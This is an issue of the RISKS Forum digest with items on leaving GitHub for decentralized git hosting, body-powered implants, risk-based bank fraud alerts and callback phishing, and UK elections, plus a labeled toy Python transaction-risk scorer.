    Subject: Microsoft, Github, & distributed revision control (Medium)

Originally posted here:
https://medium.com/%40enkiv2/microsoft-github-and-distributed-revision-control-c563b5e98d17

    Microsoft, Github, and distributed revision control

    People legitimately criticize Github for creating artificial centralization
    of open source software & having a dysfunctional internal culture, and for
    being a for-profit company. Microsoft's acquisition may not make any of
    these things worse, & won't make them better. But, there's a really specific
    & practical reason people not already boycotting github have begun to
    consider it in response to the Microsoft acquisition: Microsoft's history of
    using deals, acquisitions, & standards committees as anticompetitive tools.

    Github was never going to do much of anything beside host your projects, and
    since hosting your projects is its main business, it's not going to do nasty
    things like delete them. Microsoft, however, is absolutely willing to do
    that kind of thing if they decide they can get away with it. History bears
    this out -- some of it recent. Microsoft hasn't been able to do it to the
    likes of IBM or Netscape since the 90s, but only because their complacency
    over the PC market has prevented them from being able to successfully branch
    out into phones or servers; however, they have been happily performing their
    embrace-extend-exterminate tactic on open source projects for the past
    fifteen years.

    (Note: If Github got as big as Microsoft & had side hustles as profitable,
    they would do the same thing. This isn't about particular organizations
    being evil -- capitalism forces organizations to act unethically and
    illegally by punishing those unwilling to break the law.)

    People concerned about open source software distribution being centralized
    under the aegis of unreliable for-profit companies have been boycotting
    Github & Gitlab for years, and Google Code and Sourceforge before that.
    They've also been working on alternatives to central repositories.

    Named data networking goes beyond simply ensuring that the owner of the
    hostname is not a for-profit company (liable to throw out your data as soon
    as they decide that it'll make them money to do so). Instead, DNS as a
    single point of failure goes away entirely, along with reliance on data
    centers.

    If you're considering migrating away from Github -- even if the recent news
    merely reminded you of problems Github has had for years -- take this
    opportunity to migrate your repository to git-ssb or git-ipfs, instead of
    moving to another temporary host-tied third party thing like gitlab or
    bitbucket. Your commits are already identified by hashes, so why not switch
    to hashes entirely & use an NDN/DHT system? That way, there's no third party
    that could take down your commits if it goes down. The entire DNS system
    could die permanently & it wouldn't interrupt your development.

    ------------------------------

    Date: Mon, 11 Jun 2018 16:54:09 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: How the body could power pacemakers and other implantable devices
    (Charles Q. Choi)

    [From ocean wave motions to lungs! Great idea. PGN]

    Charles Q. Choi, *The Washington Post*, 9 Jun 2018
    http://www.washingtonpost.com/natio...d287b0-5559-11e8-a551-5b648abe29ef_story.html

    In I Sing the Body Electric, poet Walt Whitman waxed lyrically about the
    action and power of beautiful, curious, breathing, laughing flesh. More
    than 150 years later, MIT materials scientist and engineer Canan Dagdeviren
    and colleagues are giving new meaning to Whitman's poem with a device that
    can generate electricity from the way it distorts in response to the beating
    of the heart.

    Despite tremendous technological advances, a key drawback of most wearable
    and implantable devices is their batteries, whose limited capacities
    restrict their long-term use. The last thing you want to do when a pacemaker
    runs out of power is to open up a patient just for battery replacement.

The solution may rest inside the human body -- rich in energy in its
chemical, thermal and mechanical forms.

    The bellows-like motions that a person makes while breathing, for example,
    can generate 0.83 watts of power; the heat from a body, up to 4.8 watts; and
    the motions of the arms, up to 60 watts. That's not nothing when you
    consider that a pacemaker needs just 50 millionths of a watt to last for
    seven years, a hearing aid needs a thousandth of a watt for five days, a
    smartphone requires one watt for five hours.

    Increasingly, Dagdeviren and others are investigating a plethora of ways
    that devices could make use of these inner energy resources and are testing
    such wearable or implantable devices in animal models and people.

    Good vibrations

    One energy-harvesting strategy involves converting energy from vibrations,
    pressure and other mechanical stresses into electrical energy. This
    approach, producing what is known as piezoelectricity, is often used in
    loudspeakers and microphones.

    To take advantage of piezoelectricity, Dagdeviren and colleagues have
    developed flat devices that can be stuck onto organs and muscles such as the
    heart, lungs and diaphragm. Their mechanical properties are similar to
    whatever they are laminated onto, so they don't hinder those tissues when
    they move.

So far, such devices have been tested in cows, sheep and pigs, animals with
hearts roughly the same size as those of people. ``When these devices
mechanically distort, they create positive and negative charges, voltage and
current -- and you can collect this energy to recharge batteries. You can
use them to run biomedical devices like cardiac pacemakers instead of
changing them every six or seven years when their batteries are depleted.''

    Scientists are also developing wearable piezoelectric energy harvesters that
    can be worn on joints such as the knee or elbow, or in shoes, trousers or
    underwear. People could generate electricity for electronics whenever they
    walk or bend their arms.

    Body heat

    A different energy-harvesting approach uses thermoelectric materials to
    convert body heat to electricity. ``Your heart beats more than 40 million
    times a year,'' Dagdeviren notes. All that energy is dissipated as heat in
    the body -- it's a rich potential source to capture for other uses.

    Thermoelectric generators face key challenges. They rely on temperature
    differences, but people usually keep a fairly constant temperature
    throughout their bodies, so any temperature differences found within are
    generally not dramatic enough to generate large amounts of electricity. But
    this is not a problem if the devices are exposed to relatively cool air in
    addition to the body's continuous warmth.

    Scientists are exploring thermo-electric devices for wearable purposes, such
    as powering wristwatches. In principle, the heat from a human body can
    generate enough electricity to power wireless health monitors, cochlear
    implants and deep-brain stimulators to treat disorders such as Parkinson's
    disease.

    Static and dynamic

    Scientists have also sought to use the same effect behind everyday static
    electricity to power devices. When two different materials repeatedly
    collide with, or rub against, one another, the surface of one material can
    steal electrons from the other, accumulating a charge, a phenomenon known as
    triboelectricity. Nearly all materials, both natural and synthetic, are
    capable of creating triboelectricity, giving researchers a wide range of
    choices for designing gadgets.

    Nanotechnologist Zhong Lin Wang of Georgia Tech:

    ``The more I work with triboelectricity, the more exciting it gets, and
    the more applications it might have. I can see myself devoting the next
    20 years to it.''

    ------------------------------

    Date: Mon, 11 Jun 2018 11:58:20 -0500
    From: David Strom via WebInformant <webinf...@list.webinformant.tv>
    Subject: Having better risk-based analysis for your banks and credit cards

    David Strom's Web Informant, 11 Jun 2018
    [TNX to Gabe Goldberg]

    When someone tries to steal money from your bank or credit card accounts,
    these days it is a lot harder, thanks to a number of technologies. I
    recently personally had this situation. Someone tried to use my credit card
    on the other side of Missouri on a Sunday afternoon. Within moments, I got
    alerts from my bank, along with a toll-free number to call to verify the
    transactions. In the heat of the moment, I dialed the number and started
    talking to my bank's customer service representatives. Then it hit me: what
    if I were being phished? I told the person that I was going to call them
    back, using the number on the back of my card. Once I did, I found out I was
    talking to the right people after all, but still you can't be too careful.

    This heat-of-the-moment reaction is what the criminals count on, and how
    they prey on your heightened emotional state. In my case, I was well into my
    first call before I started thinking more carefully about the situation, so
    I could understand how phishing attacks can often work, even for experienced
    people.

    To help cut down on these sorts of exploits, banks use a variety of
    risk-based or adaptive authentication technologies that monitor your
    transactions constantly, to try to figure out if it really is you doing them
    or someone else. In my case, the pattern of life didn't fit, even though it
    was a transaction taking place only a few hundred miles away from where I
    lived. Those of you who travel internationally probably have come across
    this situation: if you forget to tell your bank you are traveling, your
    first purchase in a foreign country may be declined until you call them and
    authorize it. But now the granularity of what can be caught is much finer,
    which was good news for me.

    These technologies can take several forms: some of them are part of identity
    management tools or multi-factor authentication tools, others come as part
    of regular features of cloud access security brokers. They aren't
inexpensive, and they take time to implement properly. In a story I wrote
last month for CSOonline
<https://www.csoonline.com/article/3...me-an-essential-security-tool.html#tk.twt_cso>
I discuss what IT managers need to know to make the right purchasing
decision.

In that article, I also talk about these tools and how they have matured
over the past few years. As we move more of our online activity to mobiles
and social networks, hackers are finding ways of leveraging our identity in
new and sneaky ways. One-time passwords that are being sent to our phones
can be more readily intercepted, using the knowledge that we broadcast on
our social media. And to make matters worse, attackers are also getting
better at conducting blended attacks that can cut across a website, a mobile
phone app, voice phone calls, and legacy on-premises applications.

    Of course, all the tech in the world doesn't help if your bank can't respond
    quickly when you uncover some fraudulent activity. Criminals specifically
    targeted a UK bank that was having issues with switching over its computer
    systems last month knowing that customers would have a hard time getting
    through to its customer support call centers. The linked article documents
    how one customer waited on hold for more than four hours, watching while
    criminals took thousands of pounds out of his account. Other victims were
    robbed of five and six-figure sums after falling for phishing messages
    that asked them to input their login credentials.

<https://www.welivesecurity.com/2018/05/28/scammers-drain-mans-bank-account-fraud-hotline/>

    The moral of the story: don't panic when you get a potentially dire fraud
    alert message. Take a breath, take time to think it through. And call your
    bank when in doubt.

    Comments always welcome here: http://blog.strom.com/wp/?p=6568
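As an added example (not the post's own code, nor any bank's real system), here is a toy risk-based transaction scorer in Python implementing the "pattern of life" checks the post describes: distance from home, impossible travel since the previous transaction, and an amount outlier. The cardholder's home, the transactions, the thresholds and the rule weights are all constructed.

```python
# Added example (not from the Web Informant post, nor any bank's real system):
# a toy risk-based transaction scorer illustrating the "pattern of life"
# checks the post describes. Locations, amounts and thresholds are constructed.
from dataclasses import dataclass
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt
from statistics import median

EARTH_RADIUS_KM = 6371.0


@dataclass
class Txn:
    ts: datetime     # when the transaction was attempted
    lat: float       # merchant location for a card-present purchase
    lon: float
    amount: float
    merchant: str


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    phi1, phi2 = radians(lat1), radians(lat2)
    dphi, dlmb = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(phi1) * cos(phi2) * sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def score_txn(history, txn, home, *, home_radius_km=150.0,
              max_speed_kmh=900.0, amount_factor=3.0):
    """Return (risk, reasons) for txn given the cardholder's recent history.

    Three additive rules with constructed weights:
      +40  far from the cardholder's usual home area
      +50  implied travel speed since the previous transaction is impossible
      +30  amount is an outlier against the cardholder's typical spend
    """
    risk, reasons = 0, []

    d_home = haversine_km(home[0], home[1], txn.lat, txn.lon)
    if d_home > home_radius_km:
        risk += 40
        reasons.append(f"{d_home:.0f} km from home")

    if history:
        prev = history[-1]
        d_prev = haversine_km(prev.lat, prev.lon, txn.lat, txn.lon)
        hours = (txn.ts - prev.ts).total_seconds() / 3600.0
        # A zero or negative gap (clock skew, out-of-order feed) with a
        # non-zero distance is treated as impossible travel, never divided by.
        if d_prev > 0 and (hours <= 0 or d_prev / hours > max_speed_kmh):
            risk += 50
            reasons.append(f"impossible travel: {d_prev:.0f} km in {max(hours, 0):.2f} h")

        typical = median(t.amount for t in history)
        if typical > 0 and txn.amount > amount_factor * typical:
            risk += 30
            reasons.append(f"amount {txn.amount:.2f} vs typical {typical:.2f}")

    return risk, reasons


def decide(risk):
    """'verify' is the step-up the post describes: an alert plus a callback."""
    if risk >= 70:
        return "decline"
    if risk >= 30:
        return "verify"
    return "approve"


# Constructed data: a cardholder based in St. Louis, MO; Kansas City is on the
# other side of the state, roughly 380 km away (approximate coordinates).
STL, KC = (38.63, -90.20), (39.10, -94.58)
HOME = STL
SUNDAY = datetime(2018, 6, 10)
HISTORY = [
    Txn(SUNDAY - timedelta(days=3, hours=6), *STL, 42.10, "grocery"),
    Txn(SUNDAY - timedelta(days=1, hours=4), *STL, 18.75, "coffee"),
    Txn(SUNDAY + timedelta(hours=10), *STL, 55.00, "hardware"),
]
CASES = {
    # The post's scenario: an attempt across the state on a Sunday afternoon.
    "kc_afternoon": Txn(SUNDAY + timedelta(hours=14), *KC, 120.00, "electronics"),
    # Same purchase, but only ten minutes after the St. Louis one.
    "kc_ten_min": Txn(SUNDAY + timedelta(hours=10, minutes=10), *KC, 120.00, "electronics"),
    # Ordinary purchase at home later that day.
    "at_home": Txn(SUNDAY + timedelta(hours=16), *STL, 23.40, "grocery"),
}


def demo():
    """Score each constructed case; returns {label: (risk, action)}."""
    out = {}
    for label, txn in CASES.items():
        risk, reasons = score_txn(HISTORY, txn, HOME)
        out[label] = (risk, decide(risk))
        print(f"{label:13s} risk={risk:3d} -> {decide(risk):8s} {'; '.join(reasons)}")
    return out


if __name__ == "__main__":
    demo()
```

The "verify" outcome is where the post's advice applies: the cardholder, not the caller, should initiate the callback using the number on the card.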

    ------------------------------

    Date: Tue, 12 Jun 2018 15:44:00 -0400
    From: Phil Smith III <phsiii@gmail.
    Subject: Having better risk-based analysis for your banks and credit cards

    What continues to bug me is that banks don't ask, ``Did you call this number
    from the back of your card?'' Those of us who did will say ``Of course'',
    but we aren't the ones to worry about. I've gotten calls from banks asking
    me about transactions; when I said ``I will call you back'', they said
    ``Fine, of course.'' But they SHOULD have started the call with ``This is
    TBTF Bank, calling about a questionable transaction on your Visa card. To
    ensure that this is a legitimate conversation, please call us back at the
    number on the back of your card.''

    ------------------------------

    Date: Mon, 11 Jun 2018 22:22:41 +0100
    From: Chris Drewe <e76...@yahoo.co.uk>
    Subject: Re: Securing Elections (Shapir, R 30 71)

    This is similar in Britain (not that I'm a constitutional expert).
    Candidates stand for election in each electoral area, and we vote for which
    one we want to serve as our Member of Parliament. The winner is the one
    with most votes -- the 'first-past-the-post' system. Usually one of the big
    parties gets a majority of MPs so forms the government directly, but
    sometimes (as at the present time) the biggest party needs a support
    agreement with a smaller party to get a majority. While this may seem like
    an elected dictatorship, it's obvious who is in charge, and we get the
    chance to vote them out at the next election.

    By contrast, as I understand it, mainland European countries often have a
    large number of small parties so coalitions are the usual arrangement. The
    problem here is that much policy-making may be hidden in behind-the-scenes
    deals between parties, i.e. a party may have to support something that it
    doesn't want to get something that it does, or vice-versa. This can give
    unstable governments as in Italy as the original poster said, or the
    opposite when an election just changes a few of the elected representatives
    and everything continues as before. The EU seems to be based on the
    European model, with a large bureaucracy notionally governed by a small,
    unfocused elected assembly, which may account for the fractious relationship
    between the UK and the EU; indeed, a cynic such as myself may feel that the
    aim is to create the impression of democracy rather than giving power to
    voters.

    As British MPs are elected regionally, there's no direct correlation between
    the total number of votes gained by parties and the numbers of their MPs, so
    there are periodic campaigns to adopt some kind of proportional
    representation system, though this brings various other problems. A bigger
    problem is potential voter-identity fraud, a frequent topic in RISKS.
    There's talk of requiring voters to show some proof of identity at polling
    stations, but what, as there's no particular official UK identity document?

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.72
    ************************